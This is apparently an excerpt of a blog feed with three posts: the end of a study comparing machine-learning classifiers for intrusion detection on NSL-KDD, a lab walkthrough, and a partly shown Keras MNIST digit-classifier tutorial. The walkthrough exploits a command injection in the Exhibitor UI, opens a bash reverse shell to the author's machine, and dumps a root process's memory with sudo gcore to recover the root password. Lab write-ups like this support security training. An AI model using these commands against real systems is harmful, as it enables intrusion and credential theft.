Then I will use SelectKBest to select the number of features that I want.</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-16.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="900" height="1160" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-16.png 600w, https://blog.mohammedx.tech/content/images/2025/12/image-16.png 900w" sizes="(min-width: 720px) 720px"></figure><p>Here is a scatter plot that shows the most relevant features:</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-17.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1098" height="1146" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-17.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-17.png 1000w, https://blog.mohammedx.tech/content/images/2025/12/image-17.png 1098w" sizes="(min-width: 720px) 720px"></figure><p>Then, I use SelectKBest to choose the features and assign them to a new variable:</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-18.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="1142" height="802" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-18.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/12/image-18.png 1000w, https://blog.mohammedx.tech/content/images/2025/12/image-18.png 1142w" sizes="(min-width: 720px) 720px"></figure><p>I faced an issue with the selected features; the machine learning models only handle numeric values, yet some of my features are in string format. 
In search of a solution, I discovered a technique known as One-hot encoding, which I will explore in the following chapter.</p><hr><p><strong>One-hot encoding</strong></p><p><strong>What is Categorical Data?</strong></p><p>Categorical data refers to variables that carry label values instead of numerical ones. Normally, the values come from a fixed set.</p><ul><li>A &#x201C;pet&#x201D; variable might include options like &#x201C;dog&#x201D; and &#x201C;cat&#x201D;.</li><li>A &#x201C;color&#x201D; variable could offer choices such as &#x201C;red&#x201D;, &#x201C;green&#x201D;, and &#x201C;blue&#x201D;.</li><li>A &#x201C;place&#x201D; variable might list rankings like &#x201C;first&#x201D;, &#x201C;second&#x201D;, and &#x201C;third&#x201D;.</li></ul><p><strong>The Problem with Categorical Data</strong></p><p>Some algorithms are meant to work with categorical data straight out of the box. Decision trees, for example, have the ability to learn directly from categorical data. But a lot of machine learning algorithms aren&apos;t designed to handle label data in its original form. They demand that the variables be presented in numerical form for both the input and the output.</p><p><strong>How to Convert Categorical Data to Numerical Data?</strong></p><p><strong>Integer Encoding</strong></p><p>In the first phase of preparing categorical data for machine learning models, each unique category is assigned a specific integer. For example, the assignment could be set up so that &quot;blue&quot; goes with 3, &quot;green&quot; with 2, and &quot;red&quot; with 1. This is called integer encoding or label encoding, and it is easily reversed. This method might be more than suitable for some kinds of data. </p><p>Some machine learning algorithms can identify and make use of a naturally ordered relationship in the numerical values assigned by this method. This is especially true for ordinal variables, where the values&apos; order has significance. 
An illustration of this would be the previously discussed &quot;place&quot; variable, for which label encoding accurately captures the first, second, and third categories&apos; natural order, making it a useful technique for variables of this type.</p><p><strong>One-Hot Encoding</strong></p><p>For categorical variables where no such ordinal relationship exists, integer encoding is not enough. If integers are assigned anyway, the model may infer a natural order among categories that does not exist, which can hurt performance or produce unexpected results, such as predictions that fall illogically between categories. To address this issue, one-hot encoding is employed as an alternative strategy. This approach replaces the integer-encoded variable with new binary variables, one for each unique category value. Essentially, for every unique category, a distinct binary variable is created: this variable is set to &quot;1&quot; for its corresponding category and &quot;0&quot; for all others.</p><p>Given the three categories (&quot;red&quot;, &quot;green&quot;, and &quot;blue&quot;) in the &quot;color&quot; example, one-hot encoding would produce three binary variables. For example, if the color is &quot;green,&quot; the encoding would be [0, 1, 0], where &quot;green&quot; is indicated by a &quot;1&quot; in the second position, and &quot;red&quot; and &quot;blue&quot; are represented by &quot;0&quot; in the first and last positions, respectively. This approach captures each category&apos;s existence or absence efficiently without suggesting a hierarchy. 
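</p><p>The color example is a one-liner with pandas (a tooling assumption on my part; scikit-learn&apos;s OneHotEncoder behaves the same way):</p>

```python
import pandas as pd

colors = pd.DataFrame({"color": ["red", "green", "blue", "green"]})
# One binary column per category; columns come out in alphabetical order.
one_hot = pd.get_dummies(colors, columns=["color"]).astype(int)
print(one_hot.columns.tolist())  # → ['color_blue', 'color_green', 'color_red']
print(one_hot.iloc[1].tolist())  # the 'green' row → [0, 1, 0]
```

<p>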
(Brownlee, 2020)</p><hr><p><strong>Conclusion</strong></p><p>Based on the comprehensive analysis of Exploratory Data Analysis (EDA) and its critical role in data science, as well as the detailed exploration of the NSL-KDD dataset for intrusion detection systems, we can draw several conclusions. An essential first step in the data analysis process is exploratory data analysis. It gives data scientists the knowledge and resources they need to fully comprehend their dataset, find underlying patterns, spot anomalies, and test theories. EDA facilitates the effective communication of the story of the data through a variety of statistical methods and data visualization techniques, enabling well-informed decision-making and strategic planning.</p><p>The importance of EDA is found in its capacity to direct the choice of suitable modeling and data processing methods, guaranteeing that the analysis is in line with the current business goals and inquiries. The investigation of one-hot encoding provides additional insight into the problems and solutions related to categorical data preprocessing for machine learning. Data scientists can fully utilize their datasets by converting categorical data into a format that machine learning algorithms can understand. This allows for more precise and insightful analysis.</p><p>To sum up, the examination of EDA and its utilization with the NSL-KDD dataset highlights how interconnected preprocessing, feature selection, and data preparation are within the larger fields of cybersecurity and data science. It emphasizes the need for thorough data preparation and analysis as the first steps in obtaining trustworthy, useful insights, especially in domains where accuracy and precision are critical. 
This all-encompassing method not only makes it easier to comprehend the data at hand more deeply, but it also establishes the foundation for the creation of successful models and tactics, which in turn promotes advancements in cybersecurity and other fields.</p><hr><h2 id="question-3"><strong>Question 3</strong></h2><p><strong>What are some effective machine learning models for intrusion detection in cybersecurity, and how do they compare in terms of accuracy, performance, and scalability when applied to the NSL-KDD dataset?</strong></p><p>Machine learning primarily deals with two problem types: classification and regression. Here is a compilation of algorithms commonly used for creating classification and regression models:</p><p><strong>Classification Models:</strong></p><ul><li>Logistic Regression</li><li>Na&#xEF;ve Bayes</li><li>Decision Trees</li><li>Random Forest</li><li>K-nearest neighbor (KNN)</li><li>Support Vector Machine</li></ul><p><strong>Regression Models:</strong></p><ul><li>Linear regression</li><li>Ridge regression</li><li>Decision trees</li><li>Random forest</li><li>K-nearest neighbor (KNN)</li><li>Neural network regression</li></ul><hr><p><strong>Theoretical Approach: Common Classification Models</strong></p><p><strong>Logistic Regression</strong> </p><p>Despite its name, logistic regression is primarily utilized for binary classification problems, where data falls into two categories. Logistic regression often serves as an initial method for setting a baseline before exploring more complex models. The word &#x201C;regression&#x201D; appears in its name because it estimates the likelihood of an outcome being either 0 or 1 through a linear combination of features. (Choosing the Best Machine Learning Classification Model and Avoiding Overfitting, 2023)</p><p><strong>Naive Bayes</strong></p><p>You may want to use the naive Bayes algorithm if your task and data are relatively simple. 
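</p><p>A naive Bayes baseline takes only a few lines; an illustrative scikit-learn sketch on toy single-feature data (not the actual pipeline used later in this post):</p>

```python
import numpy as np
from sklearn.naive_bayes import GaussianNB

# Two well-separated clusters on a single feature.
X = np.array([[0.10], [0.20], [0.15], [0.90], [1.10], [1.00]])
y = np.array([0, 0, 0, 1, 1, 1])

clf = GaussianNB().fit(X, y)
print(clf.predict([[0.12], [0.95]]))  # → [0 1]
```

<p>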
When training data is limited, this classifier is a better option than nearest neighbor and logistic regression algorithms due to its high bias and low variance. Naive Bayes works especially well when memory and CPU resources are restricted. Its simplicity keeps it from overfitting and enables quick training. Additionally, it functions well when fresh data is added on a regular basis. However, as data complexity and variance increase, you might find more sophisticated classifiers to be more effective. Naive Bayes&apos; straightforward analysis may not support complex hypotheses. (Choosing the Best Machine Learning Classification Model and Avoiding Overfitting, 2023)</p><p><strong>K-Nearest Neighbor</strong></p><p>Categorizing data points by their proximity to others in a training set can be an effective classification method. The k-nearest neighbor (KNN) algorithm operates on the principle of &quot;guilty by association.&quot; Because KNN is regarded as an instance-based lazy learner, it does not go through a traditional training phase. Rather, you feed the model the training set and let it sit until you need it. The KNN model determines the given number of nearest neighbors (k) in response to a new query; for instance, if k = 5, it evaluates the class of the five closest neighbors. The model uses a voting process among these neighbors to decide which label fits best for classification. For regression tasks, it takes the mean of the values of the closest neighbors. Although KNN requires less time to train than other models, it can take longer to query and require more storage space, especially as the dataset grows, since the model retains all training data rather than just an algorithmic representation of it.</p><p><strong>Decision Trees</strong> </p><p>To understand how a decision tree predicts an outcome, start at the root (beginning) node, and follow the path down to a leaf node, which provides the response. 
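</p><p>That root-to-leaf walk can be printed directly. A toy scikit-learn sketch, with the feature name borrowed from the dataset and the data made up:</p>

```python
from sklearn.tree import DecisionTreeClassifier, export_text

# One feature, one obvious split point.
X = [[0], [1], [2], [3]]
y = [0, 0, 1, 1]

tree = DecisionTreeClassifier(random_state=0).fit(X, y)
print(export_text(tree, feature_names=["src_bytes"]))  # the root-to-leaf rules
print(tree.predict([[2.5]]))  # → [1]
```

<p>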
Classification trees generate nominal outputs like true or false, while regression trees yield numeric responses. Decision trees offer clear visibility of the decision-making path from root to leaf, making them particularly helpful when results need to be explained to stakeholders. They are also relatively quick to execute. However, a primary drawback of decision trees is their propensity to overfit data. Ensemble methods, such as bagging, can mitigate this issue. </p><p><strong>Support Vector Machine</strong> </p><p>When there are clear differences between the two classes in your dataset, you may want to use a support vector machine (SVM). SVMs operate by finding the ideal hyperplane: the one that maximizes the margin between the classes and divides the data points of one class from those of the other. SVMs deal with datasets that have more than two classes by splitting the problem into several binary classification tasks, each handled by a separate SVM. SVMs offer significant benefits. They are highly accurate and generally resistant to overfitting. Linear SVMs, in particular, are straightforward to interpret. Once trained, SVMs are very quick, allowing the training data to be discarded if memory is limited, which makes them suitable for environments with restricted resources. They also excel in complex, nonlinear classification tasks through the use of a technique known as the &quot;kernel trick.&quot;</p><p>However, SVMs require considerable upfront training and tuning, necessitating a significant time investment before they can be deployed. Additionally, their performance can decrease when handling more than two classes, affecting their speed. </p><p><strong>Neural Networks</strong></p><p>An artificial neural network (ANN) is capable of learning and can be trained to solve problems, recognize patterns, classify data, and predict future events. 
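</p><p>As a tiny illustration of that trainability, here is a sketch of scikit-learn&apos;s MLPClassifier learning XOR, a pattern no linear model can fit. This is an illustrative aside, separate from the neural network evaluated later in this post; since success depends on the random initialization, the sketch retrains over several seeds and keeps the best run:</p>

```python
from sklearn.neural_network import MLPClassifier

# XOR: not linearly separable, so the hidden layer has to do real work.
X = [[0, 0], [0, 1], [1, 0], [1, 1]]
y = [0, 1, 1, 0]

# Fine-tuning a trained net is impractical, so we simply retrain from
# several random initializations and keep the best-scoring run.
best = max(
    (MLPClassifier(hidden_layer_sizes=(8,), solver="lbfgs", max_iter=2000,
                   random_state=seed).fit(X, y) for seed in range(5)),
    key=lambda m: m.score(X, y),
)
print(best.predict(X))
```

<p>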
ANNs are frequently employed for complex challenges like character recognition, stock market predictions, and image compression. The functionality of a neural network hinges on the architecture of its nodes and the strength of the connections between them, known as weights. These weights adjust automatically during training, adhering to specific learning rules until the network proficiently executes the intended task. ANNs excel in handling nonlinear data with numerous input features, making them ideal for tackling sophisticated problems that simpler algorithms struggle with. However, they come with some downsides: ANNs are resource-intensive, their decision-making processes are often opaque (making it hard to deduce how a solution was reached) and fine-tuning them can be impractical&#x2014;you generally have to alter the training inputs and retrain the network entirely.</p><p><strong>Practical Application: Common Classification Models</strong></p><p><strong>Logistic Regression</strong></p><p>Importing and building the model.</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-19.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="424" height="210"></figure><p>Evaluating the model</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-20.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="635" height="209" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-20.png 600w, https://blog.mohammedx.tech/content/images/2025/12/image-20.png 635w"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-21.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="318" height="221"></figure><figure class="kg-card kg-image-card"><img 
src="https://blog.mohammedx.tech/content/images/2025/12/image-22.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="436" height="207"></figure><p><strong>Random Forest Classifier</strong></p><p>Importing and building the model</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-24.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="724" height="416" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-24.png 600w, https://blog.mohammedx.tech/content/images/2025/12/image-24.png 724w" sizes="(min-width: 720px) 720px"></figure><p>Evaluating the model</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-26.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="505" height="560"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-27.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="466" height="258"></figure><p><strong>Decision Trees Classifier</strong></p><p>Importing and building the model</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-28.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="384" height="229"></figure><p>Evaluating the model</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-29.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="469" height="463"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-30.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="531" 
height="204"></figure><p><strong>Na&#xEF;ve Bayes</strong></p><p>Importing and building the model</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-31.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="314" height="168"></figure><p>Evaluating the model</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-32.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="332" height="345"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-33.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="830" height="329" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/12/image-33.png 600w, https://blog.mohammedx.tech/content/images/2025/12/image-33.png 830w" sizes="(min-width: 720px) 720px"></figure><p><strong>Support Vector Machines Linear</strong></p><p>Importing and building the model</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-34.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="324" height="248"></figure><p>Evaluating the model</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-35.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="360" height="368"></figure><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-36.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="358" height="173"></figure><hr><p><strong>Models Evaluation</strong></p><p>In cybersecurity, accurately identifying attacks is crucial. 
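</p><p>The per-model numbers reported below (accuracy, precision, recall, and the confusion-matrix counts) can all be computed with scikit-learn; a toy sketch with made-up predictions:</p>

```python
from sklearn.metrics import (accuracy_score, confusion_matrix,
                             precision_score, recall_score)

y_true = [1, 0, 1, 1, 0, 1, 0, 1]  # 1 = attack, 0 = normal
y_pred = [1, 0, 0, 1, 0, 1, 1, 1]  # one missed attack, one false alarm

tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
print(accuracy_score(y_true, y_pred))   # → 0.75
print(precision_score(y_true, y_pred))  # → 0.8
print(recall_score(y_true, y_pred))     # → 0.8
print(fn)  # missed attacks (false negatives) → 1
```

<p>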
Misclassifying an attack as normal can cause severe damage, while misclassifying normal activity as an attack is less harmful. I&apos;ve built six machine learning models to classify attacks in the NSL-KDD dataset, focusing on minimizing false negatives to enhance security. </p><p>For each ML model, I will provide the accuracy, precision, and recall. Additionally, I will include a heatmap showing True/False Positives/Negatives. Note: I aim to minimize false negatives, as missing attacks in security is highly undesirable.</p><p><strong>Logistic Regression</strong></p><ul><li>Accuracy: 72%</li><li>Precision: 92%</li><li>Recall: 62% </li><li>False Positive: 754</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-38.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="397" height="326"></figure><p><strong>Random Forest Classifier</strong></p><ul><li>Accuracy: 75%</li><li>Precision: 97%</li><li>Recall: 63%</li><li>False Positive: 284</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-39.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="425" height="349"></figure><p><strong>Decision Trees Classifier</strong></p><ul><li>Accuracy: 81%</li><li>Precision: 89%</li><li>Recall: 73%</li><li>False Positive: 1007</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-40.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="434" height="336"></figure><p><strong>Na&#xEF;ve Bayes</strong></p><ul><li>Accuracy: 55% </li><li>Precision: 43% </li><li>Recall: 48% </li><li>False Positive: 5492</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-41.png" class="kg-image" alt="Machine Learning Models in Network Security" 
loading="lazy" width="402" height="333"></figure><p><strong>Support Vector Machine Linear</strong></p><ul><li>Accuracy: 71% </li><li>Precision: 92%</li><li>Recall: 61%</li><li>False Positive: 723</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-43.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="406" height="331"></figure><p><strong>Neural Network</strong></p><ul><li>Accuracy: 97.07%</li><li>Precision: 97.11%</li><li>Recall: 97.07%</li><li>False Positive: 197</li></ul><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/12/image-44.png" class="kg-image" alt="Machine Learning Models in Network Security" loading="lazy" width="335" height="282"></figure><p><strong>Conclusion</strong></p><p>In evaluating the performance of six machine learning models for classifying attacks in the NSL-KDD dataset, a key focus has been on minimizing false positives to ensure high security. Each model was assessed for accuracy, precision, and recall, alongside a detailed analysis of false positives and negatives.</p><p>Among the models tested, the Neural Network demonstrated superior performance with an accuracy of 97.07%, a precision of 97.11%, and a recall of 97.07%, while maintaining the lowest number of false positives at 197. This indicates its strong capability in accurately identifying attacks and minimizing false alarms, which is critical in a cybersecurity context.</p><p>The Random Forest Classifier also showed promising results with high precision (97%) and relatively low false positives (284), though it lagged in recall (63%). 
Other models, such as Logistic Regression and Support Vector Machine Linear, offered good precision but were less effective in recall and had higher false positives compared to the Neural Network.</p><p>Overall, the Neural Network model stands out as the most effective for this task, striking the best balance between accuracy, precision, and recall, while minimizing the risk of false positives. This makes it a highly suitable choice for enhancing security by reliably detecting attacks without overwhelming analysts with false alerts.</p>]]></content:encoded></item><item><title><![CDATA[Extracting Root Creds From Running Services]]></title><description><![CDATA[<p>Start Pelican and get the IP.</p><p>My IP: 192.168.116.98</p><p>Here are the learning Objectives for the exercise:</p><ul><li>Identify and exploit the Exhibitor UI command injection vulnerability to gain a low-privilege shell.</li><li>Enumerate processes and privileges available to the compromised user.</li><li>Use sudo access to gcore to dump</li></ul>]]></description><link>https://blog.mohammedx.tech/extracting-root-creds-from-running-services/</link><guid isPermaLink="false">68f4c338df5d8b0001f1f787</guid><category><![CDATA[labs]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Sun, 19 Oct 2025 11:25:35 GMT</pubDate><content:encoded><![CDATA[<p>Start Pelican and get the IP.</p><p>My IP: 192.168.116.98</p><p>Here are the learning objectives for the exercise:</p><ul><li>Identify and exploit the Exhibitor UI command injection vulnerability to gain a low-privilege shell.</li><li>Enumerate processes and privileges available to the compromised user.</li><li>Use sudo access to gcore to dump memory of an active root process.</li><li>Analyze the dumped memory to extract sensitive information, such as root credentials.</li><li>Escalate privileges to root using the extracted credentials and validate full system access.</li></ul><p>The first thing I did was run nmap:</p><pre><code class="language-bash">nmap -sV -sC 192.168.116.98</code></pre><p>I found ports 22, 139, 445, 631, 2222, 8080, and 8081 open.</p><p>I tried to access 8080 but I wasn&apos;t allowed. Next, I tried to access 8081 and found a web page. </p><p>After investigating the website for some time, I found that the config page executes commands from the java.env script. This was being executed:</p><pre><code>export JAVA_OPTS=&quot;-Xms1000m -Xmx1000m&quot;</code></pre><p>Switch on editing mode at the top left.</p><p>I removed it and tried to ping my machine, both to check that I can run commands and to check that outbound traffic is allowed.</p><pre><code>#Kali 
sudo tcpdump -i tun0 icmp</code></pre><pre><code>#java.env script
ping 192.168.45.159</code></pre><p>I executed this by clicking &quot;Commit&quot; and confirming all the prompts.</p><p>I saw the ICMP packets coming in, so outbound traffic works.</p><p>I got a simple bash reverse shell from revshells.com and put it there.</p><pre><code>#Kali
nc -lvnp 4444</code></pre><pre><code>#java.env script
bash -i &gt;&amp; /dev/tcp/192.168.45.159/4444 0&gt;&amp;1</code></pre><p>Commit again and you&apos;ll get a shell.</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/10/image.png" class="kg-image" alt loading="lazy" width="379" height="65"></figure><p>Now you can find the first flag, called local.txt.</p><p>Now I have a low-privilege shell and I want to get root.</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/10/image-1.png" class="kg-image" alt loading="lazy" width="670" height="149" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/10/image-1.png 600w, https://blog.mohammedx.tech/content/images/2025/10/image-1.png 670w"></figure><p><strong>What is gcore?</strong></p><p><code>gcore</code> creates a memory dump of a running process.<br>In privilege escalation, you use it to dump a root process (like <code>sshd</code> or <code>su</code>) and extract secrets (like passwords or keys) from its memory.</p><p>I looked at the running processes:</p><pre><code class="language-bash">ps aux | grep root</code></pre><p>I spent some time trying to work out what could help me dump root credentials, and I found a process called &quot;/usr/bin/password-store&quot; with a PID of 513.</p><p>Go to GTFOBins: <a href="https://gtfobins.github.io/?ref=blog.mohammedx.tech">https://gtfobins.github.io/</a> </p><p>Look for gcore sudo. 
</p><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/10/image-2.png" class="kg-image" alt loading="lazy" width="860" height="205" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/10/image-2.png 600w, https://blog.mohammedx.tech/content/images/2025/10/image-2.png 860w" sizes="(min-width: 720px) 720px"></figure><p>This allows me to use sudo with no password to dump information about root processes.</p><pre><code class="language-bash">sudo gcore 513</code></pre><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/10/image-3.png" class="kg-image" alt loading="lazy" width="1369" height="131" srcset="https://blog.mohammedx.tech/content/images/size/w600/2025/10/image-3.png 600w, https://blog.mohammedx.tech/content/images/size/w1000/2025/10/image-3.png 1000w, https://blog.mohammedx.tech/content/images/2025/10/image-3.png 1369w" sizes="(min-width: 720px) 720px"></figure><p>The dumped memory is saved to the core file core.513. You can&apos;t just open it and search for credentials, because there is far too much data, so we use strings to extract the readable text.</p><pre><code class="language-bash">strings core.513</code></pre><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/10/image-4.png" class="kg-image" alt loading="lazy" width="361" height="185"></figure><pre><code>su root
#Enter the extracted password
cat /root/proof.txt</code></pre><figure class="kg-card kg-image-card"><img src="https://blog.mohammedx.tech/content/images/2025/10/image-6.png" class="kg-image" alt loading="lazy" width="169" height="263"></figure>]]></content:encoded></item><item><title><![CDATA[Digit Classifier]]></title><description><![CDATA[<p>I wanted to learn PyTorch, but this project ended up using TensorFlow/Keras to build a Convolutional Neural Network (CNN) model that can classify digits on a canvas. Here is the final product: <a href="https://cnn.mohammedx.tech/?ref=blog.mohammedx.tech">https://cnn.mohammedx.tech/</a> </p><p></p><h2 id="requirements"><strong>Requirements</strong></h2><pre><code class="language-python">pip install numpy matplotlib tensorflow scikit-learn streamlit streamlit-drawable-canvas pillow pandas</code></pre><p>Don&apos;t</p>]]></description><link>https://blog.mohammedx.tech/digit-classifier/</link><guid isPermaLink="false">688bf46fa8bbd600013b8fcb</guid><category><![CDATA[AI]]></category><dc:creator><![CDATA[Mohammed Alshukaili]]></dc:creator><pubDate>Thu, 31 Jul 2025 23:18:51 GMT</pubDate><media:content url="https://blog.mohammedx.tech/content/images/2025/07/nnvis.webp" medium="image"/><content:encoded><![CDATA[<img src="https://blog.mohammedx.tech/content/images/2025/07/nnvis.webp" alt="Digit Classifier"><p>I wanted to learn PyTorch, but this project ended up using TensorFlow/Keras to build a Convolutional Neural Network (CNN) model that can classify digits on a canvas. Here is the final product: <a href="https://cnn.mohammedx.tech/?ref=blog.mohammedx.tech">https://cnn.mohammedx.tech/</a> </p><p></p><h2 id="requirements"><strong>Requirements</strong></h2><pre><code class="language-python">pip install numpy matplotlib tensorflow scikit-learn streamlit streamlit-drawable-canvas pillow pandas</code></pre><p>Don&apos;t forget to use a virtual env.</p><pre><code class="language-python">from numpy import mean, std
from matplotlib import pyplot as plt
from sklearn.model_selection import KFold
from tensorflow.keras.datasets import mnist
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten
from tensorflow.keras.optimizers import SGD

def load_dataset():
    (trainX, trainY), (testX, testY) = mnist.load_data()
    trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
    testX = testX.reshape((testX.shape[0], 28, 28, 1))
    trainY = to_categorical(trainY)
    testY = to_categorical(testY)
    return trainX, trainY, testX, testY

def prep_pixels(train, test):
    train_norm = train.astype(&apos;float32&apos;) / 255.0
    test_norm = test.astype(&apos;float32&apos;) / 255.0
    return train_norm, test_norm

def define_model():
    model = Sequential()
    model.add(Conv2D(32, (3, 3), activation=&apos;relu&apos;, kernel_initializer=&apos;he_uniform&apos;, input_shape=(28, 28, 1)))
    model.add(MaxPooling2D((2, 2)))
    model.add(Flatten())
    model.add(Dense(100, activation=&apos;relu&apos;, kernel_initializer=&apos;he_uniform&apos;))
    model.add(Dense(10, activation=&apos;softmax&apos;))
    opt = SGD(learning_rate=0.01, momentum=0.9)
    model.compile(optimizer=opt, loss=&apos;categorical_crossentropy&apos;, metrics=[&apos;accuracy&apos;])
    return model

def evaluate_model(dataX, dataY, n_folds=5):
    scores, histories = list(), list()
    kfold = KFold(n_folds, shuffle=True, random_state=1)
    for train_ix, test_ix in kfold.split(dataX):
        model = define_model()
        trainX, trainY = dataX[train_ix], dataY[train_ix]
        testX, testY = dataX[test_ix], dataY[test_ix]
        history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
        _, acc = model.evaluate(testX, testY, verbose=0)
        print(&apos;&gt; %.3f&apos; % (acc * 100.0))
        scores.append(acc)
        histories.append(history)
    return scores, histories

def summarize_diagnostics(histories):
    for i in range(len(histories)):
        plt.subplot(2, 1, 1)
        plt.title(&apos;Cross Entropy Loss&apos;)
        plt.plot(histories[i].history[&apos;loss&apos;], color=&apos;blue&apos;)
        plt.plot(histories[i].history[&apos;val_loss&apos;], color=&apos;orange&apos;)
        plt.subplot(2, 1, 2)
        plt.title(&apos;Classification Accuracy&apos;)
        plt.plot(histories[i].history[&apos;accuracy&apos;], color=&apos;blue&apos;)
        plt.plot(histories[i].history[&apos;val_accuracy&apos;], color=&apos;orange&apos;)
    plt.show()

def summarize_performance(scores):
    print(&apos;Accuracy: mean=%.3f std=%.3f, n=%d&apos; % (mean(scores)*100, std(scores)*100, len(scores)))
    plt.boxplot(scores)
    plt.show()

def run_test_harness():
    trainX, trainY, testX, testY = load_dataset()
    trainX, testX = prep_pixels(trainX, testX)
    scores, histories = evaluate_model(trainX, trainY)
    summarize_diagnostics(histories)
    summarize_performance(scores)

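# Note: the save_model() helper described in the Model Training and Saving
# section is not part of the listing above; this is a minimal sketch (an
# assumption about its shape) that trains once on all training data,
# outside cross-validation, and writes the final_model.h5 file that the
# prediction and Streamlit code load later.
def save_model():
    trainX, trainY, testX, testY = load_dataset()
    trainX, testX = prep_pixels(trainX, testX)
    model = define_model()
    model.fit(trainX, trainY, epochs=10, batch_size=32, verbose=0)
    model.save('final_model.h5')
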
run_test_harness()</code></pre><p></p><h3 id="1data-loading-and-preprocessing">1- Data Loading and Preprocessing</h3><h4 id="loaddataset"><code>load_dataset()</code></h4><ul><li>Loads the MNIST dataset (handwritten digits 0&#x2013;9).</li><li>Applies one-hot encoding to labels for training.</li></ul><h4 id="preppixelstrain-test"><code>prep_pixels(train, test)</code></h4><ul><li>Converts images from <code>uint8</code> to <code>float32</code>.</li><li>Normalizes pixel values from <code>[0, 255]</code> to <code>[0.0, 1.0]</code>.</li></ul><h4 id="definemodel"><code>define_model()</code></h4><ul><li>Builds a simple CNN:<ul><li><code>Conv2D</code>: Detects patterns in images.</li><li><code>MaxPooling2D</code>: Reduces spatial dimensions.</li><li><code>Flatten</code>: Flattens 2D to 1D.</li><li><code>Dense</code>: Fully connected layers to classify digits.</li></ul></li><li>Compiles with <code>SGD</code> optimizer and categorical cross-entropy loss.</li></ul><h3 id="2evaluation-with-k-fold-cross-validation">2- Evaluation with K-Fold Cross-Validation</h3><h4 id="evaluatemodeldatax-datay-nfolds5"><code>evaluate_model(dataX, dataY, n_folds=5)</code></h4><ul><li>Splits the training data into 5 folds.</li><li>Trains and validates on different splits to reduce 